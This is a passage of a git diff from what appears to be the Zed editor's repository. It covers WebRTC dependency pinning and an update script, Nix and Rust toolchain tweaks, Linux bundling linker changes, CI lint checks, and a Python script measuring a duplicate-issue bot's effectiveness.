"37f6e68a107df43b7d7e044fd36a13cbae3413f2", + "url": "https://chromium.googlesource.com/external/github.com/llvm/llvm-project/clang/tools/clang-format.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/colorama/src": { + "args": { + "hash": "sha256-6ZTdPYSHdQOLYMSnE+Tp7PgsVTs3U2awGu9Qb4Rg/tk=", + "rev": "3de9f013df4b470069d03d250224062e8cf15c49", + "url": "https://chromium.googlesource.com/external/colorama.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/compiler-rt/src": { + "args": { + "hash": "sha256-yo7BFGgwJNScsXwnCAu8gFBdZVS8/HJplzUk2e73mVg=", + "rev": "57213f125d03209892fed26189feb3b736e96735", + "url": "https://chromium.googlesource.com/external/github.com/llvm/llvm-project/compiler-rt.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/crc32c/src": { + "args": { + "hash": "sha256-KBraGaO5LmmPP+p8RuDogGldbTWdNDK+WzF4Q09keuE=", + "rev": 
"d3d60ac6e0f16780bcfcc825385e1d338801a558", + "url": "https://chromium.googlesource.com/external/github.com/google/crc32c.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/dav1d/libdav1d": { + "args": { + "hash": "sha256-+DY4p41VuAlx7NvOfXjWzgEhvtpebjkjbFwSYOzSjv4=", + "rev": "8d956180934f16244bdb58b39175824775125e55", + "url": "https://chromium.googlesource.com/external/github.com/videolan/dav1d.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/depot_tools": { + "args": { + "hash": "sha256-DWQyYtpAAGiryeGJzIWlUwY5yn4cNwXY957vlPDUNak=", + "rev": "fa8fc854e1766b86f10c9a15902cf3cc23adaac2", + "url": "https://chromium.googlesource.com/chromium/tools/depot_tools.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/ffmpeg": { + "args": { + "hash": "sha256-hNzQZQxaa2Wtl7GWWF852cFmmXy4pc15Pp0d59TTfnI=", + "rev": "01f23648c6b84de6c0f717fa4e1816f53b9ee72e", + "url": "https://chromium.googlesource.com/chromium/third_party/ffmpeg.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/flatbuffers/src": { + "args": { + "hash": "sha256-tbc45o0MbMvK5XqRUJt5Eg8BU6+TJqlmwFgQhHq6wRM=", + "rev": "8db59321d9f02cdffa30126654059c7d02f70c32", + "url": "https://chromium.googlesource.com/external/github.com/google/flatbuffers.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/fontconfig/src": { + "args": { + "hash": "sha256-W5WIgC6A52kY4fNkbsDEa0o+dfd97Rl5NKfgnIRpI00=", + "rev": "14d466b30a8ab4a9d789977ed94f2c30e7209267", + "url": "https://chromium.googlesource.com/external/fontconfig.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/freetype/src": { + "args": { + "hash": "sha256-Vlin6Z+QisUyj6R+TclVOm8x6673YhUIWob9Ih6gzC8=", + "rev": "1da283b8ae6d6b94f34a5c4b8c1227adc9dbb1d8", + "url": "https://chromium.googlesource.com/chromium/src/third_party/freetype2.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/fuzztest/src": { + "args": { + "hash": 
"sha256-L2QG0pUmGjGdtdlivxYfxSqO9YaVHpIT6lvJwBMTxMw=", + "rev": "b10387fdbbca18192f85eaa5323a59f44bf9c468", + "url": "https://chromium.googlesource.com/external/github.com/google/fuzztest.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/google_benchmark/src": { + "args": { + "hash": "sha256-cH8s1gP6kCcojAAfTt5iQCVqiAaSooNk4BdaILujM3w=", + "rev": "761305ec3b33abf30e08d50eb829e19a802581cc", + "url": "https://chromium.googlesource.com/external/github.com/google/benchmark.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/googletest/src": { + "args": { + "hash": "sha256-QT9PQ9bF+eCPfRLkcHpH4jc0UZfGPc98fHf8QDV5bZg=", + "rev": "cd430b47a54841ec45d64d2377d7cabaf0eba610", + "url": "https://chromium.googlesource.com/external/github.com/google/googletest.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/grpc/src": { + "args": { + "hash": "sha256-xivmP36VCSbiMAV3PDUjzCrF+AJzFXJdMe5e2q9yW/k=", + "rev": "957c9f95224b1e1318c0ecb98d0e7584ea5ccff2", + "url": "https://chromium.googlesource.com/external/github.com/grpc/grpc.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/gtest-parallel": { + "args": { + "hash": "sha256-VUuk5tBTh+aU2dxVWUF1FePWlKUJaWSiGSXk/J5zgHw=", + "rev": "96f4f904922f9bf66689e749c40f314845baaac8", + "url": "https://chromium.googlesource.com/external/github.com/google/gtest-parallel" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/harfbuzz-ng/src": { + "args": { + "hash": "sha256-lNnCtgIegUy4DLhYaGZXcEaFw83KWAHoKpz69AEsWp4=", + "rev": "9f83bbbe64654b45ba5bb06927ff36c2e7588495", + "url": "https://chromium.googlesource.com/external/github.com/harfbuzz/harfbuzz.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/icu": { + "args": { + "hash": "sha256-eGI/6wk6IOUPvX7pRTm4VJk1CqkkxalTu84L36i/D6k=", + "rev": "4c8cc4b365a505ce35be1e0bd488476c5f79805d", + "url": "https://chromium.googlesource.com/chromium/deps/icu.git" + }, + "fetcher": "fetchFromGitiles" + }, + 
"src/third_party/instrumented_libs": { + "args": { + "hash": "sha256-8kokdsnn5jD9KgM/6g0NuITBbKkGXWEM4BMr1nCrfdU=", + "rev": "69015643b3f68dbd438c010439c59adc52cac808", + "url": "https://chromium.googlesource.com/chromium/third_party/instrumented_libraries.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/jsoncpp/source": { + "args": { + "hash": "sha256-bSLNcoYBz3QCt5VuTR056V9mU2PmBuYBa0W6hFg2m8Q=", + "rev": "42e892d96e47b1f6e29844cc705e148ec4856448", + "url": "https://chromium.googlesource.com/external/github.com/open-source-parsers/jsoncpp.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/libFuzzer/src": { + "args": { + "hash": "sha256-Lb+HczYax0T7qvC0/Nwhc5l2szQTUYDouWRMD/Qz7sA=", + "rev": "e31b99917861f891308269c36a32363b120126bb", + "url": "https://chromium.googlesource.com/external/github.com/llvm/llvm-project/compiler-rt/lib/fuzzer.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/libaom/source/libaom": { + "args": { + "hash": "sha256-ngVZ+xK0b+jKUmawteQ7VFAQzoebX4jqZ3hP9pW+Q0Q=", + "rev": "a23a4799ec2d7dd6e436c7b64a34553773014ed7", + "url": "https://aomedia.googlesource.com/aom.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/libc++/src": { + "args": { + "hash": "sha256-lqeuVUgeAKm1pxo+w1vyUbBkBXBzLCQ+Lfu44neKLPo=", + "rev": "917609c669e43edc850eeb192a342434a54e1dfd", + "url": "https://chromium.googlesource.com/external/github.com/llvm/llvm-project/libcxx.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/libc++abi/src": { + "args": { + "hash": "sha256-X9cAbyd8ZPSwqOGhPYwIZ6b9E3tVwAuAYZKMgbZQxgk=", + "rev": "f2a7f2987f9dcdf8b04c2d8cd4dcb186641a7c3e", + "url": "https://chromium.googlesource.com/external/github.com/llvm/llvm-project/libcxxabi.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/libjpeg_turbo": { + "args": { + "hash": "sha256-Ig+tmprZDvlf/M72/DTar2pbxat9ZElgSqdXdoM0lPs=", + "rev": "e14cbfaa85529d47f9f55b0f104a579c1061f9ad", + "url": 
"https://chromium.googlesource.com/chromium/deps/libjpeg_turbo.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/libsrtp": { + "args": { + "hash": "sha256-bkG1+ss+1a2rCHGwZjhvf5UaNVbPPZJt9HZSIPBKGwM=", + "rev": "a52756acb1c5e133089c798736dd171567df11f5", + "url": "https://chromium.googlesource.com/chromium/deps/libsrtp.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/libunwind/src": { + "args": { + "hash": "sha256-XdFKn+cGOxA0fHkVMG9UAhCmpML44ocoyHB7XnumX7o=", + "rev": "81e2cb40a70de2b6978e6d8658891ded9a77f7e3", + "url": "https://chromium.googlesource.com/external/github.com/llvm/llvm-project/libunwind.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/libvpx/source/libvpx": { + "args": { + "hash": "sha256-NIGpzP6elcPScHJlZmnPHJdmXsuHcbuELT0C4Ha5PcA=", + "rev": "ff1d193f4b9dfa9b2ced51efbb6ec7a69e58e88c", + "url": "https://chromium.googlesource.com/webm/libvpx.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/libyuv": { + "args": { + "hash": "sha256-b/EYCWBQvsNoGhea31DPBKpG8eouf0OBi5TgdHDHs9A=", + "rev": "1e40e34573c3861480d107cd4a4ce290df79951f", + "url": "https://chromium.googlesource.com/libyuv/libyuv.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/llvm-libc/src": { + "args": { + "hash": "sha256-yNNx3gOGafMNvZ+aebDKHVj6QM8g0zt0d69PWlWLkyk=", + "rev": "912274164f0877ca917c06e8484ad3be1784833a", + "url": "https://chromium.googlesource.com/external/github.com/llvm/llvm-project/libc.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/lss": { + "args": { + "hash": "sha256-rhp4EcZYdgSfu9cqn+zxxGx6v2IW8uX8V+iA0UfZhFY=", + "rev": "ed31caa60f20a4f6569883b2d752ef7522de51e0", + "url": "https://chromium.googlesource.com/linux-syscall-support.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/nasm": { + "args": { + "hash": "sha256-neYrS4kQ76ihUh22Q3uPR67Ld8+yerA922YSZU1KxJs=", + "rev": "9f916e90e6fc34ec302573f6ce147e43e33d68ca", + "url": 
"https://chromium.googlesource.com/chromium/deps/nasm.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/openh264/src": { + "args": { + "hash": "sha256-tf0lnxATCkoq+xRti6gK6J47HwioAYWnpEsLGSA5Xdg=", + "rev": "652bdb7719f30b52b08e506645a7322ff1b2cc6f", + "url": "https://chromium.googlesource.com/external/github.com/cisco/openh264" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/perfetto": { + "args": { + "hash": "sha256-I0qiAh3VliVop+3S2/tP6VwCAJOk0Vu7xy8vHJZ1w2A=", + "rev": "a54dd38d60593129ae56d400f1a72860670abea4", + "url": "https://chromium.googlesource.com/external/github.com/google/perfetto.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/protobuf-javascript/src": { + "args": { + "hash": "sha256-zq86SrDASl6aYPFPijRZp03hJqXUFz2Al/KkiNq7i0M=", + "rev": "eb785a9363664a402b6336dfe96aad27fb33ffa8", + "url": "https://chromium.googlesource.com/external/github.com/protocolbuffers/protobuf-javascript" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/re2/src": { + "args": { + "hash": "sha256-f/k2rloV2Nwb0KuJGUX4SijFxAx69EXcsXOG4vo+Kis=", + "rev": "c84a140c93352cdabbfb547c531be34515b12228", + "url": "https://chromium.googlesource.com/external/github.com/google/re2.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/tools": { + "args": { + "hash": "sha256-kZFZl8SC9nZIIOVtNl/5H4huw6BCBsBkJVJ4gaUmly4=", + "rev": "ffcbc837bbb14d80d09147c2af5302ff6bd4bd69", + "url": "https://chromium.googlesource.com/chromium/src/tools" + }, + "fetcher": "fetchFromGitiles" + } +} diff --git a/nix/livekit-libwebrtc/update.sh b/nix/livekit-libwebrtc/update.sh new file mode 100644 index 0000000000000000000000000000000000000000..b28c405b300280b25ab7aa3b85936d0f3ae75878 --- /dev/null +++ b/nix/livekit-libwebrtc/update.sh @@ -0,0 +1,33 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i bash -p gitMinimal curl gojq gclient2nix + +set -eou pipefail +package="livekit-libwebrtc" +pkg_dir="$(dirname "$0")" +nixpkgs="$(git rev-parse --show-toplevel)" + 
+gh-curl () { + curl --silent ${GITHUB_TOKEN:+-u ":$GITHUB_TOKEN"} "$1" +} + +# Get the current version part before the "-unstable-" for the branch name. +# To manually update to a new major version, you can also invoke the script +# with the new major version, e.g., UPDATE_MAJOR_VERSION=137. +old_version="${UPDATE_NIX_OLD_VERSION:-$(nix-instantiate --eval -E "(import \"$nixpkgs\" { }).$package.version" | tr -d '"')}" +major_version="${UPDATE_MAJOR_VERSION:-${old_version%%-unstable-*}}" +branch="m${major_version}_release" + +# Fetch the current HEAD commit of the release branch +head="$(gh-curl "https://api.github.com/repos/webrtc-sdk/webrtc/git/refs/heads/$branch" | gojq '.object.sha' --raw-output)" +if gojq -e ".src.args.rev == \"$head\"" "$pkg_dir/sources.json"; then + echo "$package is already up-to-date: $head" + exit 0 +fi + +# Get the commit's date for the version field +date="$(gh-curl "https://api.github.com/repos/webrtc-sdk/webrtc/git/commits/$head" | gojq '.committer.date| split("T") | .[0]' --raw-output)" + +echo "Updating sources.json to $head" +gclient2nix generate --root src "https://github.com/webrtc-sdk/webrtc@$head" > "$pkg_dir/sources.json" + +sed -i "s|$old_version|$major_version-unstable-$date|g" "$pkg_dir/package.nix" diff --git a/nix/modules/devshells.nix b/nix/modules/devshells.nix index cfc0e48b871e71d87f9f794b35c16fed714ed4a9..ab58d37fff2dcaa64885effa5526db7bd365586b 100644 --- a/nix/modules/devshells.nix +++ b/nix/modules/devshells.nix @@ -22,10 +22,14 @@ # Cargo build timings wrapper script wrappedCargo = pkgs.writeShellApplication { name = "cargo"; - runtimeInputs = [pkgs.nodejs]; - text = '' - NIX_WRAPPER=1 CARGO=${rustToolchain}/bin/cargo ./script/cargo "$@" - ''; + runtimeInputs = [ pkgs.nodejs ]; + text = + let + pathToCargoScript = ./. 
+ "/../../script/cargo"; + in + '' + NIX_WRAPPER=1 CARGO=${rustToolchain}/bin/cargo ${pathToCargoScript} "$@" + ''; }; in { @@ -34,7 +38,7 @@ inputsFrom = [ zed-editor ]; packages = with pkgs; [ - wrappedCargo # must be first, to shadow the `cargo` provided by `rustToolchain` + wrappedCargo # must be first, to shadow the `cargo` provided by `rustToolchain` rustToolchain # cargo, rustc, and rust-toolchain.toml components included cargo-nextest cargo-hakari diff --git a/nix/toolchain.nix b/nix/toolchain.nix index 6ef22e2a6b06882940c553b2a774f4c6f73e9ea0..2e32f00f6b56570ab9863ab0b5975e603b68f5fa 100644 --- a/nix/toolchain.nix +++ b/nix/toolchain.nix @@ -6,4 +6,5 @@ in pkgs.callPackage ./build.nix { crane = inputs.crane.mkLib pkgs; rustToolchain = rustBin.fromRustupToolchainFile ../rust-toolchain.toml; + commitSha = inputs.self.rev or null; } diff --git a/rust-toolchain.toml b/rust-toolchain.toml index 89b3c648ca2a8a9b893d1b0924697f8170047761..15b4a8f0fc9f93064f08046bcb1edff01e6c6d44 100644 --- a/rust-toolchain.toml +++ b/rust-toolchain.toml @@ -1,5 +1,5 @@ [toolchain] -channel = "1.93" +channel = "1.94.1" profile = "minimal" components = [ "rustfmt", "clippy", "rust-analyzer", "rust-src" ] targets = [ diff --git a/script/bundle-linux b/script/bundle-linux index 4e58ac315bd231fd4ae9208abbc15007abc30631..3487feaf32b9e8258a88a7a1b14c2aafccc37942 100755 --- a/script/bundle-linux +++ b/script/bundle-linux @@ -71,10 +71,18 @@ if "$rustup_installed"; then rustup target add "$remote_server_triple" fi -export CC=$(which clang) +export CC=${CC:-$(which clang)} # Build binary in release mode -export RUSTFLAGS="${RUSTFLAGS:-} -C link-args=-Wl,--disable-new-dtags,-rpath,\$ORIGIN/../lib" +# We need lld to link libwebrtc.a successfully on aarch64-linux. +# NOTE: Since RUSTFLAGS env var overrides all .cargo/config.toml rustflags +# (see https://github.com/rust-lang/cargo/issues/5376), the +# [target.aarch64-unknown-linux-gnu] section in config.toml has no effect here. 
+if [[ "$(uname -m)" == "aarch64" ]]; then + export RUSTFLAGS="${RUSTFLAGS:-} -C link-arg=-fuse-ld=lld -C link-args=-Wl,--disable-new-dtags,-rpath,\$ORIGIN/../lib" +else + export RUSTFLAGS="${RUSTFLAGS:-} -C link-args=-Wl,--disable-new-dtags,-rpath,\$ORIGIN/../lib" +fi cargo build --release --target "${target_triple}" --package zed --package cli # Build remote_server in separate invocation to prevent feature unification from other crates # from influencing dynamic libraries required by it. @@ -111,10 +119,12 @@ else fi fi -# Strip debug symbols and save them for upload to DigitalOcean -objcopy --strip-debug "${target_dir}/${target_triple}/release/zed" -objcopy --strip-debug "${target_dir}/${target_triple}/release/cli" -objcopy --strip-debug "${target_dir}/${remote_server_triple}/release/remote_server" +# Strip debug symbols and save them for upload to DigitalOcean. +# We use llvm-objcopy because GNU objcopy on older distros (e.g. Ubuntu 20.04) +# doesn't understand CREL sections produced by newer LLVM. +llvm-objcopy --strip-debug "${target_dir}/${target_triple}/release/zed" +llvm-objcopy --strip-debug "${target_dir}/${target_triple}/release/cli" +llvm-objcopy --strip-debug "${target_dir}/${remote_server_triple}/release/remote_server" # Ensure that remote_server does not depend on libssl nor libcrypto, as we got rid of these deps. 
if ldd "${target_dir}/${remote_server_triple}/release/remote_server" | grep -q 'libcrypto\|libssl'; then diff --git a/script/clippy b/script/clippy index 5c13b0b39cea3937a43ca54de074e5f65fae7c3b..617d99a5623e6406d1dc01247ea2f5b8e5c3b762 100755 --- a/script/clippy +++ b/script/clippy @@ -16,4 +16,8 @@ if [[ -z "${GITHUB_ACTIONS+x}" ]]; then which typos >/dev/null 2>&1 || exit 0 typos --config typos.toml + + which buf >/dev/null 2>&1 || exit 0 + buf lint crates/proto/proto + buf format --diff --exit-code crates/proto/proto fi diff --git a/script/danger/dangerfile.ts b/script/danger/dangerfile.ts index b604a42e45ac7d276a1f278bd2e9727daa98c375..99a29e51d9f287c87d6db3fec7252a28e33b95cc 100644 --- a/script/danger/dangerfile.ts +++ b/script/danger/dangerfile.ts @@ -12,7 +12,7 @@ prHygiene({ }, }); -const RELEASE_NOTES_PATTERN = /Release Notes:\r?\n\s+-/gm; +const RELEASE_NOTES_PATTERN = /Release Notes:(\r?\n)+- /gm; const body = danger.github.pr.body; const hasReleaseNotes = RELEASE_NOTES_PATTERN.test(body); @@ -61,6 +61,25 @@ if (includesIssueUrl) { ); } +const MIGRATION_SCHEMA_FILES = [ + "crates/collab/migrations/20251208000000_test_schema.sql", + "crates/collab/migrations.sqlite/20221109000000_test_schema.sql", +]; + +const modifiedSchemaFiles = danger.git.modified_files.filter((file) => + MIGRATION_SCHEMA_FILES.some((schemaFilePath) => file.endsWith(schemaFilePath)), +); + +if (modifiedSchemaFiles.length > 0) { + warn( + [ + "This PR modifies database schema files.", + "", + "If you are making database changes, a migration needs to be added in the Cloud repository.", + ].join("\n"), + ); +} + const FIXTURE_CHANGE_ATTESTATION = "Changes to test fixtures are intentional and necessary."; const FIXTURES_PATHS = ["crates/assistant_tools/src/edit_agent/evals/fixtures"]; diff --git a/script/docs-suggest-publish b/script/docs-suggest-publish index 23578785159b5fd720e84d3658f7f76dddf3ada9..fc420f3fbc774df0dbd7667a5cd6dd76682e9548 100755 --- a/script/docs-suggest-publish +++ 
b/script/docs-suggest-publish @@ -131,14 +131,14 @@ if [[ "$DRY_RUN" == "true" ]]; then echo "Would auto-apply suggestions to docs via Droid and create a draft PR." echo "Model: $MODEL" echo "" - + # Show each suggestion file for file in $(echo "$MANIFEST" | jq -r '.suggestions[].file'); do echo "--- $file ---" git show "origin/$SUGGESTIONS_BRANCH:$file" 2>/dev/null || echo "(file not found)" echo "" done - + echo -e "${YELLOW}=== END DRY RUN ===${NC}" echo "" echo "Run without --dry-run to create the PR." @@ -213,7 +213,7 @@ fi FLAGGED_PRS=() FLAGS_FILE="$REPO_ROOT/crates/feature_flags/src/flags.rs" if [[ -f "$FLAGS_FILE" ]]; then - # Extract feature flag struct names (e.g. SubagentsFeatureFlag, GitGraphFeatureFlag) + # Extract feature flag struct names (e.g. SubagentsFeatureFlag) FLAG_NAMES=$(grep -oE 'pub struct \w+FeatureFlag' "$FLAGS_FILE" | awk '{print $3}') if [[ -n "$FLAG_NAMES" ]]; then FLAG_PATTERN=$(echo "$FLAG_NAMES" | tr '\n' '|' | sed 's/|$//') @@ -538,10 +538,10 @@ echo -e "${GREEN}PR created:${NC} $PR_URL" if [[ "$KEEP_QUEUE" != "true" ]]; then echo "" echo "Resetting suggestions queue..." - + git checkout --orphan "${SUGGESTIONS_BRANCH}-reset" git rm -rf . > /dev/null 2>&1 || true - + cat > README.md << 'EOF' # Documentation Suggestions Queue @@ -562,19 +562,19 @@ run `script/docs-suggest-publish` to create a documentation PR from these sugges 3. At preview release, suggestions are collected into a docs PR 4. After docs PR is created, this branch is reset EOF - + mkdir -p suggestions echo '{"suggestions":[]}' > manifest.json git add README.md suggestions manifest.json git commit -m "Reset documentation suggestions queue Previous suggestions published in: $PR_URL" - + # Force push required: replacing the orphan suggestions branch with a clean slate git push -f origin "${SUGGESTIONS_BRANCH}-reset:$SUGGESTIONS_BRANCH" git checkout "$ORIGINAL_BRANCH" git branch -D "${SUGGESTIONS_BRANCH}-reset" - + echo "Suggestions queue reset." 
else git checkout "$ORIGINAL_BRANCH" diff --git a/script/github-track-duplicate-bot-effectiveness.py b/script/github-track-duplicate-bot-effectiveness.py index ca1ec5a9165bb9264dac1ad3fba7345a12d90f55..05e64026d9538606927da2c7e5cfbf211eb42d2e 100644 --- a/script/github-track-duplicate-bot-effectiveness.py +++ b/script/github-track-duplicate-bot-effectiveness.py @@ -24,6 +24,7 @@ import functools import os import re import sys +from datetime import datetime, timezone import requests @@ -39,10 +40,22 @@ BOT_START_DATE = "2026-02-18" NEEDS_TRIAGE_LABEL = "state:needs triage" DEFAULT_PROJECT_NUMBER = 76 VALID_CLOSED_AS_VALUES = {"duplicate", "not_planned", "completed"} -# Bump this when the duplicate-detection bot's behavior changes in a way that -# could affect outcome rates (e.g. prompt rewrites, model swaps, candidate -# filtering changes). Don't bump for unrelated changes like comment formatting. -BOT_VERSION = "v2" +# Add a new tuple when you deploy a new version of the bot that you want to +# keep track of (e.g. the prompt gets a rewrite or the model gets swapped). +# Newest first, please. The datetime is for the deployment time (merge to main). 
+BOT_VERSION_TIMELINE = [ + ("v2", datetime(2026, 2, 26, 14, 9, tzinfo=timezone.utc)), + ("v1", datetime(2026, 2, 18, tzinfo=timezone.utc)), +] + + +def bot_version_for_time(date_string): + """Return the bot version that was active at the given ISO 8601 timestamp.""" + timestamp = datetime.fromisoformat(date_string.replace("Z", "+00:00")) + for version, deployed in BOT_VERSION_TIMELINE: + if timestamp >= deployed: + return version + return BOT_VERSION_TIMELINE[-1][0] def github_api_get(path, params=None): @@ -79,13 +92,14 @@ def fetch_issue(issue_number): "node_id": data["node_id"], "author": (data.get("user") or {}).get("login", ""), "type_name": (data.get("type") or {}).get("name"), + "created_at": data.get("created_at", ""), } -def get_bot_duplicate_comment(issue_number): - """Get the bot's duplicate-detection comment body from an issue. +def get_bot_comment_with_time(issue_number): + """Get the bot's duplicate-detection comment and its timestamp from an issue. - Returns the comment body if found, else None. + Returns {"body": str, "created_at": str} if found, else None. """ comments_path = f"/repos/{REPO_OWNER}/{REPO_NAME}/issues/{issue_number}/comments" page = 1 @@ -94,7 +108,7 @@ def get_bot_duplicate_comment(issue_number): author = (comment.get("user") or {}).get("login", "") body = comment.get("body", "") if author == BOT_LOGIN and body.startswith(BOT_COMMENT_PREFIX): - return body + return {"body": body, "created_at": comment.get("created_at", "")} page += 1 return None @@ -104,8 +118,8 @@ def parse_suggested_issues(comment_body): return [int(match) for match in re.findall(r"^- #(\d+)", comment_body, re.MULTILINE)] -def github_api_graphql(query, variables=None): - """Execute a GitHub GraphQL query. Raises on errors.""" +def github_api_graphql(query, variables=None, partial_errors_ok=False): + """Execute a GitHub GraphQL query. 
Raises on errors unless partial_errors_ok is set.""" response = requests.post( GRAPHQL_URL, headers=GITHUB_HEADERS, @@ -114,43 +128,51 @@ def github_api_graphql(query, variables=None): response.raise_for_status() data = response.json() if "errors" in data: - raise RuntimeError(f"GraphQL errors: {data['errors']}") + if not partial_errors_ok or "data" not in data: + raise RuntimeError(f"GraphQL errors: {data['errors']}") + print(f" GraphQL partial errors (ignored): {data['errors']}") return data["data"] -def get_closed_as_duplicate_of(issue_number): - """Get the issue number this issue was closed as a duplicate of. +def find_canonical_among(duplicate_number, candidates): + """Check if any candidate issue has duplicate_number marked as a duplicate. - Uses the timeline to find the most recent MarkedAsDuplicateEvent. - Returns the original issue number, or None. + The MarkedAsDuplicateEvent lives on the canonical issue's timeline, not the + duplicate's. So to find which canonical issue our duplicate was closed against, + we check each candidate's timeline for a MarkedAsDuplicateEvent whose + `duplicate` field matches our issue. - Note: not all "closed as duplicate" issues have a MarkedAsDuplicateEvent. - If the closer used the "Close as duplicate" button without separately - marking the duplicate relationship, no event is created and this returns - None. The caller handles this by flagging the item for manual review. + Returns the matching canonical issue number, or None. """ + if not candidates: + return None + data = github_api_graphql( """ - query($owner: String!, $repo: String!, $number: Int!) { + query($owner: String!, $repo: String!, $numbers: [Int!]!) { repository(owner: $owner, name: $repo) { - issue(number: $number) { - timelineItems(last: 10, itemTypes: [MARKED_AS_DUPLICATE_EVENT]) { - nodes { - ... on MarkedAsDuplicateEvent { - canonical { ... 
on Issue { number } } - } - } - } - } + PLACEHOLDER } } - """, - {"owner": REPO_OWNER, "repo": REPO_NAME, "number": issue_number}, + """.replace("PLACEHOLDER", "\n ".join( + f'issue_{number}: issue(number: {number}) {{' + f' timelineItems(last: 50, itemTypes: [MARKED_AS_DUPLICATE_EVENT]) {{' + f' nodes {{ ... on MarkedAsDuplicateEvent {{ duplicate {{ ... on Issue {{ number }} }} }} }} }} }}' + for number in candidates + )), + {"owner": REPO_OWNER, "repo": REPO_NAME, "numbers": list(candidates)}, + partial_errors_ok=True, ) - nodes = data["repository"]["issue"]["timelineItems"]["nodes"] - for node in reversed(nodes): - if original := (node.get("canonical") or {}).get("number"): - return original + + repo = data["repository"] + for candidate in candidates: + issue_data = repo.get(f"issue_{candidate}") + if not issue_data: + continue + for node in issue_data["timelineItems"]["nodes"]: + dup_number = (node.get("duplicate") or {}).get("number") + if dup_number == duplicate_number: + return candidate return None @@ -265,7 +287,7 @@ def set_field_value(item_id, field_name, value): ) -def add_or_update_project_item(issue_node_id, outcome, closed_as=None, status="Auto-classified", notes=None): +def add_or_update_project_item(issue_node_id, outcome, closed_as=None, status="Auto-classified", notes=None, bot_comment_time=None): """Add an issue to the project board (or update it if already there), setting field values.""" item_id = find_project_item(issue_node_id) if item_id: @@ -283,7 +305,8 @@ def add_or_update_project_item(issue_node_id, outcome, closed_as=None, status="A if notes: set_field_value(item_id, "Notes", notes) - set_field_value(item_id, "Bot version", BOT_VERSION) + if bot_comment_time: + set_field_value(item_id, "Bot version", bot_version_for_time(bot_comment_time)) return item_id @@ -302,14 +325,14 @@ def classify_closed(issue_number, closer_login, state_reason): print(f" Skipping: author '{author}' is a staff member") return - bot_comment = 
get_bot_duplicate_comment(issue_number) + bot_comment = get_bot_comment_with_time(issue_number) bot_commented = bot_comment is not None print(f" Bot commented: {bot_commented}") closer_is_author = closer_login == author if bot_commented and closer_is_author: - classify_as_success(issue, state_reason) + classify_as_success(issue, bot_comment, state_reason) elif bot_commented and not closer_is_author: # Only authors, staff, and triagers can close issues, so # a non-author closer is always someone with elevated permissions. @@ -320,7 +343,7 @@ def classify_closed(issue_number, closer_login, state_reason): print(" Skipping: no bot comment and not closed as duplicate") -def classify_as_success(issue, state_reason): +def classify_as_success(issue, bot_comment, state_reason): """Author closed their own issue after the bot commented.""" if state_reason == "duplicate": status = "Auto-classified" @@ -340,6 +363,7 @@ def classify_as_success(issue, state_reason): closed_as=state_reason, status=status, notes=notes, + bot_comment_time=bot_comment["created_at"], ) @@ -356,46 +380,48 @@ def classify_non_author_closed(issue, bot_comment, state_reason): closed_as=state_reason, status="Needs review", notes=notes, + bot_comment_time=bot_comment["created_at"], ) def classify_as_assist(issue, bot_comment): """Staff member closed as duplicate after the bot commented. 
Check if the dup matches.""" - suggested = parse_suggested_issues(bot_comment) + suggested = parse_suggested_issues(bot_comment["body"]) + if not suggested: + print(" -> Assist, needs review (could not parse bot suggestions)") + add_or_update_project_item( + issue["node_id"], outcome="Assist", closed_as="duplicate", + status="Needs review", notes="Could not parse bot suggestions", + bot_comment_time=bot_comment["created_at"]) + return + original = None try: - original = get_closed_as_duplicate_of(issue["number"]) + original = find_canonical_among(issue["number"], suggested) except (requests.RequestException, RuntimeError) as error: - print(f" Warning: failed to get the original-for the duplicate issue: {error}") - - if original and suggested: - if original in suggested: - status = "Auto-classified" - notes = None - print(f" -> Assist (original #{original} matches bot suggestion)") - else: - status = "Needs review" - suggested_str = ", ".join(f"#{number}" for number in suggested) - notes = f"Bot suggested {suggested_str}; closed as dup of #{original}" - print(f" -> Possible Assist, needs review ({notes})") + print(f" Warning: failed to query candidate timelines: {error}") + + if original: + status = "Auto-classified" + notes = None + print(f" -> Assist (original #{original} matches bot suggestion)") else: - # couldn't determine original or no suggestions parsed status = "Needs review" - if not original: - notes = "Could not determine original issue from timeline" - else: - notes = f"Closed as dup of #{original}; could not parse bot suggestions" + suggested_str = ", ".join(f"#{number}" for number in suggested) + notes = f"Bot suggested {suggested_str}; none matched as canonical" print(f" -> Possible Assist, needs review ({notes})") add_or_update_project_item( - issue["node_id"], outcome="Assist", closed_as="duplicate", status=status, notes=notes) + issue["node_id"], outcome="Assist", closed_as="duplicate", 